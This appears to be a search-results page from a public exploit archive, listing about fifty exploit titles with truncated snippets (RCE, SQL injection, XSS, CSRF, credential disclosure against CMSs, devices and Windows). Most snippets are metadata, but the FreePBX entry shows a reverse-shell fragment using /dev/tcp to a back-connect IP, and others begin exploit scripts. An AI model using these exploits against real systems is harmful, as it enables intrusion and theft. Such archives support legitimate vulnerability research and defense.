47904 matches found
Pluck 4.7.7-dev2 - PHP Code Execution
Exploit Title: Pluck 4.7.7-dev2 - PHP Code Execution Date: 2024-10-26 Exploit Author: CodeSecLab Vendor Homepage: https://github.com/pluck-cms/pluck Software Link: https://github.com/pluck-cms/pluck Version: 4.74-dev5 Tested on: Ubuntu Windows CVE : CVE-2018-11736 PoC: 1) 1. Log in to the Pluck...
FreePBX 16 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...
LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution RCE Authenticated Date: 2024-1-19 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: https://www.lepton-cms.com/ Version : 7.0.0 1 Login with admin cred https://127.0.0.1/LEPTON/backend/login/index.php 2 Go to Languages place...
Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS
Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS Date: 2024-02-08 Exploit Author: Hakkı TOKLU Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html Version: 1.0 Tested on:...
Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019 - Stored XSS
Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel Date: 10-30-23 Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security Vendor Homepage: https://www.solar-log.com/en/ Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019 Tested on: Proprietary devices:...
Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection SSTI Authenticated Exploit Author: Daniel Barros @cupc4k3d - Hakai Offensive Security Date: 03/08/2023 Vendor: https://pyrocms.com/ Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation Vulnerable...
Dompdf 1.2.1 - Remote Code Execution (RCE)
!/usr/bin/python3 Exploit Title: Dompdf 1.2.1 - Remote Code Execution RCE Date: 16 February 2023 Exploit Author: Ravindu Wickramasinghe @rvizx9 Vendor Homepage: https://dompdf.github.io/ Software Link: https://github.com/dompdf/dompdf Version: 1.2.1 Tested on: Kali linux CVE : CVE-2022-28368 Gith...
WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: WebHMI 4.1.1 - Remote Code Execution RCE Authenticated Date: 03/01/2022 Exploit Author: Antonio Cuomo arkantolo Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI 4.1.1.7662 Tested on: WebHMI-4.1.1.7662 !/usr/bin/python import sys import re import argparse import requests...
Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting
Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting Date: 2021-03-02 Exploit Author: Praharsh Kumar Singh Vendor Homepage: https://www.sourcecodester.com Software Download Link:...
WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated)
Exploit Title: WebsiteBaker 2.12.2 - 'displayname' SQL Injection authenticated Google Dork: - Date: 2020-09-20 Exploit Author: Roel van Beurden Vendor Homepage: https://websitebaker.org Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Version: 2.12.2 Tested on: Linux Ubuntu 18.0...
Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Trend Micro Web Security Virtual Appliance Remote Code Execution', 'Description' = %q This module exploits multiple vulnerabilities together in...
NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)
Exploit Title: NukeViet VMS 4.4.00 - Cross-Site Request Forgery Change Admin Password Date: 2020-05-18 Exploit Author: JEBARAJ Vendor Homepage: https://nukeviet.vn/ Software Link: https://github.com/nukeviet/nukeviet/releases/download/4.4.00/nukeviet4.4.00setup.zip Version: 4.4.00 Tested on:...
Microsoft Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File
We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file i.e. LoadLibraryExLOADLIBRARYASDATAFILE | LOADLIBRARYASIMAGERESOURCE. An example crash log generated after triggering the bug is shown below: --...
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
/ Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure Author : Byte Reaper Telegram : @ByteReaper0 CVE : CVE-2025-6082 Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/ Description : Proof‑of‑Concept exploits the Full Path Disclosure bu...
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy management a...
Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path
Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path Exploit Author : SamAlucard Exploit Date: 2024-07-31 Vendor : Genexus Version : Genexus Protection Server 9.7.2.10 Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;...
Daily Expense Manager 1.0 - 'term' SQLi
Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi Date: February 25th, 2024 Exploit Author: Stefan Hesselman Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ Software Link:...
Blood Bank 1.0 - 'bid' SQLi
Exploit Title: Blood Bank 1.0 - 'bid' SQLi Date: 2023-11-15 Exploit Author: Ersin Erenler Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code Software Link: https://download-media.code-projects.org/2020/11/BloodBankInPHPWithSourcecode.zip Version: 1.0 Tested on:...
Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting Date: 2023.Aug.01 Exploit Author: Pedro ISSDU TW Vendor Homepage: https://loganalyzer.adiscon.com/ Software Link: https://loganalyzer.adiscon.com/download/ Version: v4.1.13 and before Tested on: Linux CVE : CVE-2023-36306 There ar...
FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)
Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution RCE Date: 18/04/2023 Exploit Author: Rodolfo Mariano Vendor Homepage: https://github.com/frangoteam/FUXA Version: FUXA V.1.1.13-1186 current from argparse import RawTextHelpFormatter import argparse, sys, threading, requests...
Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting XSS Date: 2021-09-08 Exploit Author: Emre Aslan Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip Version:...
SEO Panel 4.6.0 - Remote Code Execution (2)
Exploit Title: SEO Panel 4.6.0 - Remote Code Execution 2 Date: 22 Jan 2021 Exploit Author: Kr0ff Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/ Software Link: https://www.seopanel.org/spdownload/4.6.0 Version: 4.6.0 Tested on: Ubuntu 20.04 !/usr/bin/env python3 ''' DESCRIPTION...
Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting Date: 10-18-2020 Exploit Author: Matthew Aberegg Vendor Homepage: https://www.nagios.com/products/nagios-xi/ Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ Software Link:...
VMware vCenter Server 6.7 - Authentication Bypass
Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass Date: 2020-06-01 Exploit Author: Photubias Vendor Advisory: 1 https://www.vmware.com/security/advisories/VMSA-2020-0006.html Version: vCenter Server 6.7 before update 3f Tested on: vCenter Server Appliance 6.7 RTM updated from v6.0...
Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass
Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass Exploit Author : Halis Duraki @0xduraki Date : 2020-05-28 Product : http-protection Crystal Shard Product URI : https://github.com/rogeriozambon/http-protection Version : http-protection = 0.2.0 CVE : N/A About the product...
Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery
Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery Date: 2019-11-06 Exploit Author: Joas Antonio Vendor Homepage: intelbras.com.br Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200 Version: 1.1.3 REQUIRED Tested on: Windows CVE ...
SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery Discovery by: LiquidWorm Date: 2019-12-02 Vendor Homepage: Tested Version: 6.5.33.17072501 CVE: N/A Advisory ID: ZSL-2019-5543 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php Carlo Gavazzi SmartHous...
Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)
Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting XSS Date: 20-06-2024 Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://automad.org Software Link: https://github.com/marcantondahmen/automad Category: Web Application Flat File CMS Version: 2.0.0-alpha.4 Tested on:...
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offer...
Wordpress Sonaar Music Plugin 4.7 - Stored XSS
Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS Date: 2023-09-05 Exploit Author: Furkan Karaarslan Category : Webapps Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php Version: 4.7 REQUIRED Tested on: Windows/Linux...
Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction
!/usr/bin/env python Exploit Title: Tinycontrol LAN Controller v3 LK3 - Remote Credentials Extraction Exploit Author: LiquidWorm Vendor: Tinycontrol Product web page: https://www.tinycontrol.pl Affected version: this with a calendar when - then. The device provides a user interface in the form of...
Dolibarr Version 17.0.1 - Stored XSS
Exploit Title: Dolibarr Version 17.0.1 - Stored XSS Dork: Date: 2023-08-09 Exploit Author: Furkan Karaarslan Category : Webapps Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php Version: 17.0.1 REQUIRED Tested on: Windows/Linux CVE :...
PHPJabbers Simple CMS 5.0 - SQL Injection
Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection Date: 2023-04-29 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.phpjabbers.com/faq.php Software Link: https://www.phpjabbers.com/simple-cms/ Version: 5.0 Tested on: Kali Linux Request GET...
ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)
Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution RCE Application: ProjeQtOr Project Management System Version: 10.3.2 Bugs: Remote Code Execution RCE Authenticated via file upload Technology: PHP Vendor URL: https://www.projeqtor.org Software Link:...
Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: Serendipity 2.4.0 - Remote Code Execution RCE Authenticated Application: Serendipity Version: 2.4.0 Bugs: Remote Code Execution RCE Authenticated via file upload Technology: PHP Vendor URL: https://docs.s9y.org/ Software Link: https://docs.s9y.org/downloads.html Date of found:...
Geonetwork 4.2.0 - XML External Entity (XXE)
Exploit Title: Geonetwork 4.2.0 - XML External Entity XXE Date: 2022-July-11 Exploit Author: Amel BOUZIANE-LEBLOND https://twitter.com/amellb Vendor Homepage: https://geonetwork-opensource.org/ Version: Geonetwork 3.10.X through 4.2.0 Tested on: Microsoft Windows Server & Linux Description:...
Online Project Time Management System 1.0 - SQLi (Authenticated)
Exploit Title: Online Project Time Management System 1.0 - SQLi Authenticated Date: 19/01/2022 Exploit Author: Felipe Alcantara Filiplain Vendor Homepage: https://www.sourcecodester.com/ Software Link:...
Creston Web Interface 1.0.0.2159 - Credential Disclosure
Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure Exploit Author: RedTeam Pentesting GmbH Advisory: Credential Disclosure in Web Interface of Crestron Device When the administrative web interface of the Crestron HDMI switcher is accessed unauthenticated, user credentials are...
Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path
Exploit Title: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path Dicovery by: Ekrem Can Kök Discovery Date: 2021-03-22 Vendor Homepage: https://www.hirezstudios.com Version: 5.1.6.3 Tested on: Windows 10 Pro x64 Step to discover Unquoted Service Path: C:\wmic service get name,...
bloofoxCMS 0.5.2.1 - CSRF (Add user)
Title: bloofoxCMS 0.5.2.1 - CSRF Add user Exploit Author: LiPeiYi Date: 2020-12-18 Vendor Homepage: https://www.bloofox.com/ Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 Version: 0.5.1.0 -.5.2.1 Tested on: windows 10 Desc: The application interface allows users to...
QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2020-08-03 Vendor Homepage: https://www.qlik.com Software Link: https://www.qlik.com/us/trial/qlik-sense-business Tested Version: 12.50.20000.0 Vulnerability Type: Denial...
Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Vesta Control Panel Authenticated Remote Code Execution", 'Description' = %q This module exploits command injection vulnerability in...
SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery
Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery Date: 2019-10-08 Exploit Author: Borja Merino and Eduardo Villaverde Vendor Homepage: https://www.sma.de Version: Firmware Version 1.6 and prior Tested on: Sunny WebBox SMA Solar Device Firmware Version...
openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery
Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE Google Dork: N/A Date: 26-08-2019 Exploit Author: Julian Rittweger Vendor Homepage: https://openitcockpit.io/ Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2 Fixed in: 3.7.1 |...
Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
!/usr/bin/env python3 Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution RCE Exploit Author: Mohammed Idrees Banyamer Instagram: @@banyamersecurity GitHub: https://github.com/mbanyamer Date: 2025-05-31 CVE: CVE-2025-30397 Vendor: Microsoft Affected Versions: Windo...
ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure
Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: FLXeon Series FBXi Series, FBTi Series, FBVi Series CBX Series FLX Series CBT Series CBV Series Firmware: =9.3.4 Summary: BACnet® Smart Building...
Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
Exploit Title: Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.office.com/ Software Link: https://www.office.com/ Details: https://github.com/passtheticket/CVE-2024-38200 Version: Microsoft Office 2019 MSO Build 1808...
Carbon Forum 5.9.0 - Stored XSS
Exploit Title: Persistent XSS in Carbon Forum 5.9.0 Stored Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.94cb.com/ Software Link: https://github.com/lincanbin/Carbon-Forum Version: 5.9.0 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent stored XSS...
changedetection < 0.45.20 - Remote Code Execution (RCE)
Exploit Title: changedetection = 0.45.20 Remote Code Execution RCE Date: 5-26-2024 Exploit Author: Zach Crosman zcrosman Vendor Homepage: changedetection.io Software Link: https://github.com/dgtlmoon/changedetection.io Version: = 0.45.20 Tested on: Linux CVE : CVE-2024-32651 from pwn import impor...
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 0.01 Revision 0 Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed by a...